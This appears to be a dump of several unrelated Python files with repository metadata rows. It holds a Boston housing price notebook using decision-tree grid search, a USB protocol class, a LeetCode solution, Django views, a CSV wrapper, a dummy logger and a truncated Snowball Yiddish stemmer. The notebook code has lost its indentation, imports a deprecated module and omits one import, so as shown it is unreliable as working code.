# So in summary, without k-fold cross validation, the Grid Search will select hyper parameter values which works really well on the sample train test split data but there is a high risk that it will work poorly for unknown datasets because of high variance.
#
#
# ### Implementation: Fitting a Model
# Our final implementation requires that we bring everything together and train a model using the **decision tree algorithm**. To ensure that we are producing an optimized model, we will train the model using the grid search technique to optimize the `'max_depth'` parameter for the decision tree. The `'max_depth'` parameter can be thought of as how many questions the decision tree algorithm is allowed to ask about the data before making a prediction. Decision trees are part of a class of algorithms called *supervised learning algorithms*.
#
# In addition, we will find our implementation is using `ShuffleSplit()` for an alternative form of cross-validation (see the `'cv_sets'` variable). While it is not the K-Fold cross-validation technique you describe in **Question 8**, this type of cross-validation technique is just as useful!. The `ShuffleSplit()` implementation below will create 10 (`'n_splits'`) shuffled sets, and for each shuffle, 20% (`'test_size'`) of the data will be used as the *validation set*. While we're working on our implementation, we'll think about the contrasts and similarities it has to the K-fold cross-validation technique.
#
# Please note that ShuffleSplit has different parameters in scikit-learn versions 0.17 and 0.18.
# For the `fit_model` function in the code cell below, we will need to implement the following:
# - Use [`DecisionTreeRegressor`](http://scikit-learn.org/stable/modules/generated/sklearn.tree.DecisionTreeRegressor.html) from `sklearn.tree` to create a decision tree regressor object.
# - Assign this object to the `'regressor'` variable.
# - Create a dictionary for `'max_depth'` with the values from 1 to 10, and assign this to the `'params'` variable.
# - Use [`make_scorer`](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.make_scorer.html) from `sklearn.metrics` to create a scoring function object.
# - Pass the `performance_metric` function as a parameter to the object.
# - Assign this scoring function to the `'scoring_fnc'` variable.
# - Use [`GridSearchCV`](http://scikit-learn.org/0.17/modules/generated/sklearn.grid_search.GridSearchCV.html) from `sklearn.grid_search` to create a grid search object.
# - Pass the variables `'regressor'`, `'params'`, `'scoring_fnc'`, and `'cv_sets'` as parameters to the object.
# - Assign the `GridSearchCV` object to the `'grid'` variable.
# In[ ]:
# TODO: Import 'make_scorer', 'DecisionTreeRegressor', and 'GridSearchCV'
from sklearn.tree import DecisionTreeRegressor
from sklearn.metrics import make_scorer
from sklearn.grid_search import GridSearchCV
def fit_model(X, y):
""" Performs grid search over the 'max_depth' parameter for a decision tree regressor trained on the input data [X, y]. """
# Create cross-validation sets from the training data
# sklearn version 0.18: ShuffleSplit(n_splits=10, test_size=0.1, train_size=None, random_state=None)
# sklearn versiin 0.17: ShuffleSplit(n, n_iter=10, test_size=0.1, train_size=None, random_state=None)
cv_sets = ShuffleSplit(X.shape[0], n_iter = 10, test_size = 0.20, random_state = 0)
# TODO: Create a decision tree regressor object
regressor = DecisionTreeRegressor(random_state = 1001)
# TODO: Create a dictionary for the parameter 'max_depth' with a range from 1 to 10
tree_range = range(1, 11)
params = dict(max_depth=[1,2,3,4,5,6,7,8,9,10])
# TODO: Transform 'performance_metric' into a scoring function using 'make_scorer'
scoring_fnc = make_scorer(performance_metric)
# TODO: Create the grid search cv object --> GridSearchCV()
# Make sure to include the right parameters in the object:
# (estimator, param_grid, scoring, cv) which have values 'regressor', 'params', 'scoring_fnc', and 'cv_sets' respectively.
grid = GridSearchCV(regressor,params,scoring=scoring_fnc,cv=cv_sets)
# Fit the grid search object to the data to compute the optimal model
grid = grid.fit(X, y)
# Return the optimal model after fitting the data
return grid.best_estimator_
# ### Making Predictions
# Once a model has been trained on a given set of data, it can now be used to make predictions on new sets of input data. In the case of a *decision tree regressor*, the model has learned *what the best questions to ask about the input data are*, and can respond with a prediction for the **target variable**. We can use these predictions to gain information about data where the value of the target variable is unknown — such as data the model was not trained on.
# ### Question 9 - Optimal Model
#
# * What maximum depth does the optimal model have? How does this result compare to your guess in **Question 6**?
#
# Run the code block below to fit the decision tree regressor to the training data and produce an optimal model.
# In[ ]:
# Fit the training data to the model using grid search
reg = fit_model(X_train, y_train)
# Produce the value for 'max_depth'
print("Parameter 'max_depth' is {} for the optimal model.".format(reg.get_params()['max_depth']))
# ** Hint: ** The answer comes from the output of the code snipped above.
#
# **Answer: ** The optimum model has a maximum depth of 4. This exactly matches our guess from ** Question 6 **. Both results are reliable as in both cases, we did cross validation with Shufflesplit combined with checking against a range of the max_depth hyperparamters to give us the most optimal value of the max_depth. So based on our course of action, there is very little chance that our model will work poorly for unknown datasets because of high variance.
# ### Question 10 - Predicting Selling Prices
# Imagine that we were a real estate agent in the Boston area looking to use this model to help price homes owned by our clients that they wish to sell. We have collected the following information from three of our clients:
#
# | Feature | Client 1 | Client 2 | Client 3 |
# | :---: | :---: | :---: | :---: |
# | Total number of rooms in home | 5 rooms | 4 rooms | 8 rooms |
# | Neighborhood poverty level (as %) | 17% | 32% | 3% |
# | Student-teacher ratio of nearby schools | 15-to-1 | 22-to-1 | 12-to-1 |
#
# * What price would you recommend each client sell his/her home at?
# * Do these prices seem reasonable given the values for the respective features?
#
# **Hint:** Use the statistics you calculated in the **Data Exploration** section to help justify your response. Of the three clients, client 3 has has the biggest house, in the best public school neighborhood with the lowest poverty level; while client 2 has the smallest house, in a neighborhood with a relatively high poverty rate and not the best public schools.
#
# Run the code block below to have your optimized model make predictions for each client's home.
# In[ ]:
# Produce a matrix for client data
client_data = [[5, 17, 15], [4, 32, 22], [8, 3, 12]]
# Show predictions
for i, price in enumerate(reg.predict(client_data)):
print("Predicted selling price for Client {}'s home: ${:,.2f}".format(i+1, price))
# ### Visualization
# In[ ]:
from matplotlib import pyplot as plt
clients = np.transpose(client_data)
pred = reg.predict(client_data)
for i, feat in enumerate(['RM', 'LSTAT', 'PTRATIO']):
plt.scatter(features[feat], prices, alpha=0.25, c=prices)
plt.scatter(clients[i], pred, color='black', marker='x', linewidths=2)
plt.xlabel(feat)
plt.ylabel('MEDV')
print()
# **Answer: **
#
# Client 1: $403,025.00
#
# Client 2: $237,478.72
#
# Client 3: $931,636.36
#
# In our initial ** Data Exploration ** section, we saw that the price is positively correlated with the number of rooms and negatively correlated with Neighbourhood Poverty level and Student-teacher ratio of nearby schools. Also these were the statistics of our data.
#
# Minimum price: $105,000.00
#
# Maximum price: $1,024,800.00
#
# Mean price: $454,342.94
#
# Median price $438,900.00
#
# Standard deviation of prices: $165,340.28
#
# So we see that for Client 1 and 2, the price of the house is below the median price of the houses. This is reasonable because of
#
# a) High Poverty Level and Student to Teacher ratio for client 2.
#
# b) Average Poverty level and Student to Teacher ratio for client 1.
#
# For Client 3, we see that the price is well over the median house price and very close to the maximum house price. This is also reasonable because of very low Poverty Level and Student to Teacher ratio and also a high number of rooms.
#
# So overall, the prices for all the clients seem reasonable.
# ### Perfomance Metric
#
# Let us calculate the R squared value for our model.
# In[ ]:
reg = fit_model(X_train, y_train)
pred = reg.predict(X_test)
score = performance_metric(y_test,pred)
print("R Squared Value: " + str(score))
# So we get a pretty good R squared score from our model.
# ### Visualization
# In[ ]:
import matplotlib.pyplot as plt
plt.hist(prices, bins = 20)
for price in reg.predict(client_data):
plt.axvline(price, lw = 5, c = 'r')
# ### Sensitivity
# An optimal model is not necessarily a robust model. Sometimes, a model is either too complex or too simple to sufficiently generalize to new data. Sometimes, a model could use a learning algorithm that is not appropriate for the structure of the data given. Other times, the data itself could be too noisy or contain too few samples to allow a model to adequately capture the target variable — i.e., the model is underfitted.
#
# **Run the code cell below to run the `fit_model` function ten times with different training and testing sets to see how the prediction for a specific client changes with respect to the data it's trained on.**
# In[ ]:
PredictTrials(features, prices, fit_model, client_data)
# ### Question 11 - Applicability
#
# * In a few sentences, discuss whether the constructed model should or should not be used in a real-world setting.
#
# **Hint:** Take a look at the range in prices as calculated in the code snippet above. Some questions to answering:
# - How relevant today is data that was collected from 1978? How important is inflation?
# - Are the features present in the data sufficient to describe a home? Do you think factors like quality of apppliances in the home, square feet of the plot area, presence of pool or not etc should factor in?
# - Is the model robust enough to make consistent predictions?
# - Would data collected in an urban city like Boston be applicable in a rural city?
# - Is it fair to judge the price of an individual home based on the characteristics of the entire neighborhood?
# **Answer: **
#
# 1) The data which was collected in 1978 is not so relevant today because demographics and economy has changed a lot since then.
#
# 2) The features present in the data is not sufficient to describe a home. There are only three features present right now. We can add more features like crime rate, transportation avalibility, presence of pool or not, square feet of the plot area, quality of appliances, flooring in the home and more.
#
# 3) This model based on its current feature is robust enough to make consistent predictions with a small margin of error.
#
# 4) Data collected in an urban city like Boston may not be applicable in a rural city as many properties will change like the Demographics, Economy, Average income etc. So we would have to take in account a lot of other features in order to build an effective model
#
# 5) Neighbourhood plays a very vital role in judging the price of a house like the crime rate, schools, transportation etc. But if an individual house has some marked characteristics which can overshadow the factors that neighbourhood plays, then it would not be fair to judge the price of an individual home based on the characteristics of the entire neighborhood.
| 63.445869 | 1,044 | 0.74391 | 7,137 | 44,539 | 4.60936 | 0.157909 | 0.007599 | 0.013679 | 0.004377 | 0.207982 | 0.169894 | 0.116789 | 0.096453 | 0.074596 | 0.056236 | 0 | 0.01516 | 0.18101 | 44,539 | 701 | 1,045 | 63.536377 | 0.886586 | 0.806619 | 0 | 0.167785 | 0 | 0 | 0.111912 | 0.012932 | 0 | 0 | 0 | 0.001427 | 0 | 1 | 0.033557 | false | 0 | 0.14094 | 0 | 0.187919 | 0.127517 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
be9907041af54ace61dd5b4a68c1b53737c2bbfe | 353 | py | Python | src/lightuptraining/sources/antplus/usbdevice/protocols.py | marcelblijleven/light-up-training | e0310ec024c03064934f5c01d3b336dd81fac93c | [
"MIT"
] | 1 | 2021-12-05T13:55:04.000Z | 2021-12-05T13:55:04.000Z | src/lightuptraining/sources/antplus/usbdevice/protocols.py | marcelblijleven/light-up-training | e0310ec024c03064934f5c01d3b336dd81fac93c | [
"MIT"
] | null | null | null | src/lightuptraining/sources/antplus/usbdevice/protocols.py | marcelblijleven/light-up-training | e0310ec024c03064934f5c01d3b336dd81fac93c | [
"MIT"
] | null | null | null | from abc import abstractmethod
from typing import Protocol, runtime_checkable
import usb
@runtime_checkable
class Device(Protocol):
@property
@abstractmethod
def endpoint_in(self) -> usb.core.Endpoint:
pass
@property
@abstractmethod
def is_open(self) -> bool:
pass
def close(self) -> None:
pass
| 16.045455 | 47 | 0.668555 | 40 | 353 | 5.8 | 0.575 | 0.137931 | 0.215517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25779 | 353 | 21 | 48 | 16.809524 | 0.885496 | 0 | 0 | 0.466667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0.2 | 0.2 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
bea5f5d3cc66a39c609c7fa5059bdc19d1de07a4 | 544 | py | Python | easy/single-number.py | therealabdi2/LeetcodeQuestions | 4c45ee836482a2c7b59906f7a7a99b5b3fa17317 | [
"MIT"
] | null | null | null | easy/single-number.py | therealabdi2/LeetcodeQuestions | 4c45ee836482a2c7b59906f7a7a99b5b3fa17317 | [
"MIT"
] | null | null | null | easy/single-number.py | therealabdi2/LeetcodeQuestions | 4c45ee836482a2c7b59906f7a7a99b5b3fa17317 | [
"MIT"
] | null | null | null | """Given a non-empty array of integers nums, every element appears twice except for one. Find that single one.
You must implement a solution with a linear runtime complexity and use only constant extra space.
Example 1:
Input: nums = [2,2,1]
Output: 1
Example 2:
Input: nums = [4,1,2,1,2]
Output: 4
Example 3:
Input: nums = [1]
Output: 1"""
from typing import List
class Solution:
def singleNumber(self, nums: List[int]) -> int:
return 2 * sum(set(nums)) - sum(nums)
s = Solution()
print(s.singleNumber([2, 2, 1, 1, 4]))
| 18.758621 | 110 | 0.680147 | 92 | 544 | 4.021739 | 0.576087 | 0.072973 | 0.016216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048055 | 0.196691 | 544 | 28 | 111 | 19.428571 | 0.798627 | 0.626838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0.166667 | 0.666667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
bec43e02dd02f64ab4e0017090bf284fc5b51541 | 355 | py | Python | law/law119/views.py | Mj258/law110 | fb749aad473fb528bcad9b4a6159f79c696c1ae1 | [
"0BSD"
] | null | null | null | law/law119/views.py | Mj258/law110 | fb749aad473fb528bcad9b4a6159f79c696c1ae1 | [
"0BSD"
] | null | null | null | law/law119/views.py | Mj258/law110 | fb749aad473fb528bcad9b4a6159f79c696c1ae1 | [
"0BSD"
] | null | null | null | from django.shortcuts import render
from .import models
from django.views import generic
# Create your views here.
class home(generic.ListView):
queryset = models.Entry.object.published()
template_name = "law119/index.html"
paginate_by = 2
class Detail(generic.DetailView):
# model = models.Entry
template_name = "law119/post.html"
| 23.666667 | 46 | 0.740845 | 46 | 355 | 5.652174 | 0.652174 | 0.076923 | 0.138462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023649 | 0.166197 | 355 | 14 | 47 | 25.357143 | 0.85473 | 0.123944 | 0 | 0 | 0 | 0 | 0.107143 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
fe2867bf6adf4da4fa9a9a0f02072d4ccf46d6fa | 277 | py | Python | django_stachoutils/csv_utf8.py | Starou/django-stachoutils | b6f7b67edfcbb626014abae78a71348043537bff | [
"BSD-3-Clause"
] | 3 | 2017-04-26T10:32:05.000Z | 2017-12-22T11:11:15.000Z | django_stachoutils/csv_utf8.py | Starou/django-stachoutils | b6f7b67edfcbb626014abae78a71348043537bff | [
"BSD-3-Clause"
] | 22 | 2017-12-21T09:19:56.000Z | 2020-11-30T15:48:33.000Z | django_stachoutils/csv_utf8.py | Starou/django-stachoutils | b6f7b67edfcbb626014abae78a71348043537bff | [
"BSD-3-Clause"
] | null | null | null | import csv
class UnicodeWriter(object):
def __init__(self, f, **kwargs):
self.writer = csv.writer(f, **kwargs)
def writerow(self, row):
self.writer.writerow(row)
def writerows(self, rows):
for row in rows:
self.writerow(row)
| 19.785714 | 45 | 0.602888 | 35 | 277 | 4.657143 | 0.485714 | 0.08589 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.274368 | 277 | 13 | 46 | 21.307692 | 0.810945 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.111111 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
fe2b4217dac1622647fec87aeab8dbf43b01b482 | 1,218 | py | Python | antools/logging/dummy_logger.py | antonin-drozda/antools | 550310a61aae8d11e50e088731211197b7ee790b | [
"MIT"
] | 1 | 2021-02-27T07:22:39.000Z | 2021-02-27T07:22:39.000Z | antools/logging/dummy_logger.py | antonin-drozda/antools | 550310a61aae8d11e50e088731211197b7ee790b | [
"MIT"
] | null | null | null | antools/logging/dummy_logger.py | antonin-drozda/antools | 550310a61aae8d11e50e088731211197b7ee790b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
DUMMY LOGGER
"""
# %% LIBRARY IMPORT
# %% FILE IMPORT
from antools.logging.abstract_logger import AbstractLogger
# %% CLASSES
class _DummyLogger(AbstractLogger):
""" Class which represents Logger when user does not want to use it """
def __init__(self):
self.name = "DummyLogger"
def debug(self, msg:str):
pass
def info(self, msg:str):
pass
def warning(self, msg:str):
pass
def critical(self, msg:str):
pass
def error(self, msg:str, terminate:bool = True):
if terminate:
raise SystemExit(msg)
def exception(self, msg:str, add_info:bool = False, terminate:bool = False):
if terminate:
raise SystemExit(msg)
def wrong_input(self, call_object:object, var_name:"str", var_value, reason:str) -> ValueError:
object_name = call_object.__class__.__name__ if isinstance(call_object, object) else object
msg = f"{object_name} obtained invalid parameter <{var_name}> = <{var_value}>. IT IS {reason}!"
raise ValueError(msg)
# %% CREATE INSTANCE
_DUMMY_LOGGER = _DummyLogger() | 26.478261 | 103 | 0.605911 | 142 | 1,218 | 5 | 0.450704 | 0.059155 | 0.084507 | 0.078873 | 0.185915 | 0.090141 | 0 | 0 | 0 | 0 | 0 | 0.001148 | 0.284893 | 1,218 | 46 | 104 | 26.478261 | 0.814007 | 0.133826 | 0 | 0.347826 | 0 | 0 | 0.097182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.347826 | false | 0.173913 | 0.043478 | 0 | 0.434783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
fe322a9287c2f40b2ed87b2a3d5a5305617d6951 | 44,921 | py | Python | instruction_env/Lib/site-packages/snowballstemmer/yiddish_stemmer.py | lfunderburk/Effective-Instructions | ce40f890fb8623ff1ec9c3e9e1190505cbd1e6db | [
"MIT"
] | 3 | 2021-07-30T19:07:06.000Z | 2021-08-28T19:35:40.000Z | instruction_env/Lib/site-packages/snowballstemmer/yiddish_stemmer.py | lfunderburk/Effective-Instructions | ce40f890fb8623ff1ec9c3e9e1190505cbd1e6db | [
"MIT"
] | 20 | 2021-05-03T18:02:23.000Z | 2022-03-12T12:01:04.000Z | env/lib/python3.9/site-packages/snowballstemmer/yiddish_stemmer.py | simotwo/AbileneParadox-ddd | c85961efb37aba43c0d99ed1c36d083507e2b2d3 | [
"MIT"
] | 1 | 2021-02-22T13:55:32.000Z | 2021-02-22T13:55:32.000Z | # Generated by Snowball 2.1.0 - https://snowballstem.org/
from .basestemmer import BaseStemmer
from .among import Among
class YiddishStemmer(BaseStemmer):
'''
This class implements the stemming algorithm defined by a snowball script.
Generated by Snowball 2.1.0 - https://snowballstem.org/
'''
a_0 = [
Among(u"\u05D0\u05D3\u05D5\u05E8\u05DB", -1, 1),
Among(u"\u05D0\u05D4\u05D9\u05E0", -1, 1),
Among(u"\u05D0\u05D4\u05E2\u05E8", -1, 1),
Among(u"\u05D0\u05D4\u05F2\u05DE", -1, 1),
Among(u"\u05D0\u05D5\u05DE", -1, 1),
Among(u"\u05D0\u05D5\u05E0\u05D8\u05E2\u05E8", -1, 1),
Among(u"\u05D0\u05D9\u05D1\u05E2\u05E8", -1, 1),
Among(u"\u05D0\u05E0", -1, 1),
Among(u"\u05D0\u05E0\u05D8", 7, 1),
Among(u"\u05D0\u05E0\u05D8\u05E7\u05E2\u05D2\u05E0", 8, 1),
Among(u"\u05D0\u05E0\u05D9\u05D3\u05E2\u05E8", 7, 1),
Among(u"\u05D0\u05E4", -1, 1),
Among(u"\u05D0\u05E4\u05D9\u05E8", 11, 1),
Among(u"\u05D0\u05E7\u05E2\u05D2\u05E0", -1, 1),
Among(u"\u05D0\u05E8\u05D0\u05E4", -1, 1),
Among(u"\u05D0\u05E8\u05D5\u05DE", -1, 1),
Among(u"\u05D0\u05E8\u05D5\u05E0\u05D8\u05E2\u05E8", -1, 1),
Among(u"\u05D0\u05E8\u05D9\u05D1\u05E2\u05E8", -1, 1),
Among(u"\u05D0\u05E8\u05F1\u05E1", -1, 1),
Among(u"\u05D0\u05E8\u05F1\u05E4", -1, 1),
Among(u"\u05D0\u05E8\u05F2\u05E0", -1, 1),
Among(u"\u05D0\u05F0\u05E2\u05E7", -1, 1),
Among(u"\u05D0\u05F1\u05E1", -1, 1),
Among(u"\u05D0\u05F1\u05E4", -1, 1),
Among(u"\u05D0\u05F2\u05E0", -1, 1),
Among(u"\u05D1\u05D0", -1, 1),
Among(u"\u05D1\u05F2", -1, 1),
Among(u"\u05D3\u05D5\u05E8\u05DB", -1, 1),
Among(u"\u05D3\u05E2\u05E8", -1, 1),
Among(u"\u05DE\u05D9\u05D8", -1, 1),
Among(u"\u05E0\u05D0\u05DB", -1, 1),
Among(u"\u05E4\u05D0\u05E8", -1, 1),
Among(u"\u05E4\u05D0\u05E8\u05D1\u05F2", 31, 1),
Among(u"\u05E4\u05D0\u05E8\u05F1\u05E1", 31, 1),
Among(u"\u05E4\u05D5\u05E0\u05D0\u05E0\u05D3\u05E2\u05E8", -1, 1),
Among(u"\u05E6\u05D5", -1, 1),
Among(u"\u05E6\u05D5\u05D6\u05D0\u05DE\u05E2\u05E0", 35, 1),
Among(u"\u05E6\u05D5\u05E0\u05F1\u05E4", 35, 1),
Among(u"\u05E6\u05D5\u05E8\u05D9\u05E7", 35, 1),
Among(u"\u05E6\u05E2", -1, 1)
]
a_1 = [
Among(u"\u05D3\u05D6\u05E9", -1, -1),
Among(u"\u05E9\u05D8\u05E8", -1, -1),
Among(u"\u05E9\u05D8\u05E9", -1, -1),
Among(u"\u05E9\u05E4\u05E8", -1, -1)
]
a_2 = [
Among(u"\u05D5\u05E0\u05D2", -1, 1),
Among(u"\u05E1\u05D8\u05D5", -1, 1),
Among(u"\u05D8", -1, 1),
Among(u"\u05D1\u05E8\u05D0\u05DB\u05D8", 2, 31),
Among(u"\u05E1\u05D8", 2, 1),
Among(u"\u05D9\u05E1\u05D8", 4, 33),
Among(u"\u05E2\u05D8", 2, 1),
Among(u"\u05E9\u05D0\u05E4\u05D8", 2, 1),
Among(u"\u05D4\u05F2\u05D8", 2, 1),
Among(u"\u05E7\u05F2\u05D8", 2, 1),
Among(u"\u05D9\u05E7\u05F2\u05D8", 9, 1),
Among(u"\u05DC\u05E2\u05DB", -1, 1),
Among(u"\u05E2\u05DC\u05E2\u05DB", 11, 1),
Among(u"\u05D9\u05D6\u05DE", -1, 1),
Among(u"\u05D9\u05DE", -1, 1),
Among(u"\u05E2\u05DE", -1, 1),
Among(u"\u05E2\u05E0\u05E2\u05DE", 15, 3),
Among(u"\u05D8\u05E2\u05E0\u05E2\u05DE", 16, 4),
Among(u"\u05E0", -1, 1),
Among(u"\u05E7\u05DC\u05D9\u05D1\u05E0", 18, 14),
Among(u"\u05E8\u05D9\u05D1\u05E0", 18, 15),
Among(u"\u05D8\u05E8\u05D9\u05D1\u05E0", 20, 12),
Among(u"\u05E9\u05E8\u05D9\u05D1\u05E0", 20, 7),
Among(u"\u05D4\u05F1\u05D1\u05E0", 18, 27),
Among(u"\u05E9\u05F0\u05D9\u05D2\u05E0", 18, 17),
Among(u"\u05D6\u05D5\u05E0\u05D2\u05E0", 18, 22),
Among(u"\u05E9\u05DC\u05D5\u05E0\u05D2\u05E0", 18, 25),
Among(u"\u05E6\u05F0\u05D5\u05E0\u05D2\u05E0", 18, 24),
Among(u"\u05D1\u05F1\u05D2\u05E0", 18, 26),
Among(u"\u05D1\u05D5\u05E0\u05D3\u05E0", 18, 20),
Among(u"\u05F0\u05D9\u05D6\u05E0", 18, 11),
Among(u"\u05D8\u05E0", 18, 4),
Among(u"GE\u05D1\u05D9\u05D8\u05E0", 31, 9),
Among(u"GE\u05DC\u05D9\u05D8\u05E0", 31, 13),
Among(u"GE\u05DE\u05D9\u05D8\u05E0", 31, 8),
Among(u"\u05E9\u05E0\u05D9\u05D8\u05E0", 31, 19),
Among(u"\u05E1\u05D8\u05E0", 31, 1),
Among(u"\u05D9\u05E1\u05D8\u05E0", 36, 1),
Among(u"\u05E2\u05D8\u05E0", 31, 1),
Among(u"GE\u05D1\u05D9\u05E1\u05E0", 18, 10),
Among(u"\u05E9\u05DE\u05D9\u05E1\u05E0", 18, 18),
Among(u"GE\u05E8\u05D9\u05E1\u05E0", 18, 16),
Among(u"\u05E2\u05E0", 18, 1),
Among(u"\u05D2\u05D0\u05E0\u05D2\u05E2\u05E0", 42, 5),
Among(u"\u05E2\u05DC\u05E2\u05E0", 42, 1),
Among(u"\u05E0\u05D5\u05DE\u05E2\u05E0", 42, 6),
Among(u"\u05D9\u05D6\u05DE\u05E2\u05E0", 42, 1),
Among(u"\u05E9\u05D8\u05D0\u05E0\u05E2\u05E0", 42, 29),
Among(u"\u05D8\u05E8\u05D5\u05E0\u05E7\u05E0", 18, 23),
Among(u"\u05E4\u05D0\u05E8\u05DC\u05F1\u05E8\u05E0", 18, 28),
Among(u"\u05E9\u05F0\u05F1\u05E8\u05E0", 18, 30),
Among(u"\u05F0\u05D5\u05D8\u05E9\u05E0", 18, 21),
Among(u"\u05D2\u05F2\u05E0", 18, 5),
Among(u"\u05E1", -1, 1),
Among(u"\u05D8\u05E1", 53, 4),
Among(u"\u05E2\u05D8\u05E1", 54, 1),
Among(u"\u05E0\u05E1", 53, 1),
Among(u"\u05D8\u05E0\u05E1", 56, 4),
Among(u"\u05E2\u05E0\u05E1", 56, 3),
Among(u"\u05E2\u05E1", 53, 1),
Among(u"\u05D9\u05E2\u05E1", 59, 2),
Among(u"\u05E2\u05DC\u05E2\u05E1", 59, 1),
Among(u"\u05E2\u05E8\u05E1", 53, 1),
Among(u"\u05E2\u05E0\u05E2\u05E8\u05E1", 62, 1),
Among(u"\u05E2", -1, 1),
Among(u"\u05D8\u05E2", 64, 4),
Among(u"\u05E1\u05D8\u05E2", 65, 1),
Among(u"\u05E2\u05D8\u05E2", 65, 1),
Among(u"\u05D9\u05E2", 64, -1),
Among(u"\u05E2\u05DC\u05E2", 64, 1),
Among(u"\u05E2\u05E0\u05E2", 64, 3),
Among(u"\u05D8\u05E2\u05E0\u05E2", 70, 4),
Among(u"\u05E2\u05E8", -1, 1),
Among(u"\u05D8\u05E2\u05E8", 72, 4),
Among(u"\u05E1\u05D8\u05E2\u05E8", 73, 1),
Among(u"\u05E2\u05D8\u05E2\u05E8", 73, 1),
Among(u"\u05E2\u05E0\u05E2\u05E8", 72, 3),
Among(u"\u05D8\u05E2\u05E0\u05E2\u05E8", 76, 4),
Among(u"\u05D5\u05EA", -1, 32)
]
a_3 = [
Among(u"\u05D5\u05E0\u05D2", -1, 1),
Among(u"\u05E9\u05D0\u05E4\u05D8", -1, 1),
Among(u"\u05D4\u05F2\u05D8", -1, 1),
Among(u"\u05E7\u05F2\u05D8", -1, 1),
Among(u"\u05D9\u05E7\u05F2\u05D8", 3, 1),
Among(u"\u05DC", -1, 2)
]
a_4 = [
Among(u"\u05D9\u05D2", -1, 1),
Among(u"\u05D9\u05E7", -1, 1),
Among(u"\u05D3\u05D9\u05E7", 1, 1),
Among(u"\u05E0\u05D3\u05D9\u05E7", 2, 1),
Among(u"\u05E2\u05E0\u05D3\u05D9\u05E7", 3, 1),
Among(u"\u05D1\u05DC\u05D9\u05E7", 1, -1),
Among(u"\u05D2\u05DC\u05D9\u05E7", 1, -1),
Among(u"\u05E0\u05D9\u05E7", 1, 1),
Among(u"\u05D9\u05E9", -1, 1)
]
g_niked = [255, 155, 6]
g_vowel = [33, 2, 4, 0, 6]
g_consonant = [239, 254, 253, 131]
I_x = 0
I_p1 = 0
def __r_prelude(self):
v_1 = self.cursor
try:
while True:
v_2 = self.cursor
try:
try:
while True:
v_3 = self.cursor
try:
try:
v_4 = self.cursor
try:
self.bra = self.cursor
if not self.eq_s(u"\u05D5\u05D5"):
raise lab5()
self.ket = self.cursor
v_5 = self.cursor
try:
if not self.eq_s(u"\u05BC"):
raise lab6()
raise lab5()
except lab6: pass
self.cursor = v_5
if not self.slice_from(u"\u05F0"):
return False
raise lab4()
except lab5: pass
self.cursor = v_4
try:
self.bra = self.cursor
if not self.eq_s(u"\u05D5\u05D9"):
raise lab7()
self.ket = self.cursor
v_6 = self.cursor
try:
if not self.eq_s(u"\u05B4"):
raise lab8()
raise lab7()
except lab8: pass
self.cursor = v_6
if not self.slice_from(u"\u05F1"):
return False
raise lab4()
except lab7: pass
self.cursor = v_4
try:
self.bra = self.cursor
if not self.eq_s(u"\u05D9\u05D9"):
raise lab9()
self.ket = self.cursor
v_7 = self.cursor
try:
if not self.eq_s(u"\u05B4"):
raise lab10()
raise lab9()
except lab10: pass
self.cursor = v_7
if not self.slice_from(u"\u05F2"):
return False
raise lab4()
except lab9: pass
self.cursor = v_4
try:
self.bra = self.cursor
if not self.eq_s(u"\u05DA"):
raise lab11()
self.ket = self.cursor
if not self.slice_from(u"\u05DB"):
return False
raise lab4()
except lab11: pass
self.cursor = v_4
try:
self.bra = self.cursor
if not self.eq_s(u"\u05DD"):
raise lab12()
self.ket = self.cursor
if not self.slice_from(u"\u05DE"):
return False
raise lab4()
except lab12: pass
self.cursor = v_4
try:
self.bra = self.cursor
